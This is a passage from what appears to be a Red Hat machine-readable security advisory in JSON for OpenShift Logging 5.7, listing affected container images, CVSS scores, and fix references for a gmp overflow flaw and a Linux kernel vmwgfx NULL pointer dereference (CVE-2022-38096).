"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "gmp: Integer overflow and resultant buffer overflow via crafted input"
},
{
"cve": "CVE-2022-38096",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2022-09-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2133452"
}
],
"notes": [
{
"category": "description",
"text": "A NULL pointer dereference issue was found in the Linux kernel\u0027s vmwgfx driver in vmw_cmd_dx_define_query. This flaw allows a local, unprivileged attacker with access to either /dev/dri/card0 or /dev/dri/rendererD128, who can issue an ioctl() on the resulting file descriptor, to crash the system, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Systems making use of the vmwgfx driver are potentially affected by this flaw; systems without the vmwgfx driver loaded are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-38096"
},
{
"category": "external",
"summary": "RHBZ#2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096"
}
],
"release_date": "2022-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
